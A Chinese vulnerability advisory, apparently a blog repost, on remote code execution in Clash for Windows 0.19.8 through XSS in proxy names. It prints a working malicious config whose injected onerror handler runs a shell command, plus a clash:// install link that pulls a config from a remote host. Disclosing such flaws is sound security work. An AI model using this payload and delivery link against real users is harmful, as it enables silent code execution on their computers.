clash_for_windows_pkg存在Remote Code Execution/远程代码执行

admin 2022年2月25日16:35:22评论2,905 views字数 1026阅读3分25秒阅读模式

clash_for_windows_pkg存在Remote Code Execution/远程代码执行


crash_for_windows_pkg由 Electron 提供支持。如果 XSS 负载以代理的名义,我们可以远程执行受害者计算机上的任何 JavaScript 代码。

clash_for_windows_pkg存在Remote Code Execution/远程代码执行

受影响的冲突版本_for_windows_pkg

版本:0.19.8

平台:windows

操作系统细节:Windows 10

验证

  1. 导入以下冲突配置文件:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

 

  1. 在“个人资料”中切换到它

  2. 单击“代理”列(有时不需要。)

  3. clash_for_windows_pkg存在Remote Code Execution/远程代码执行

    注意:

    • 您需要确保有效负载显示在代理列中。
    • 漏洞利用在理论上是稳定的,但有时可能需要重新启动 crash_for_windows_pkg 并重现漏洞

      利用方式

      将恶意配置文件放到互联网上并用于clash://安装它,clash_for_windows_pkg 将自动下载并切换到它。

      如:

      clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月25日16:35:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   clash_for_windows_pkg存在Remote Code Execution/远程代码执行https://cn-sec.com/archives/803403.html

发表评论

匿名网友 填写信息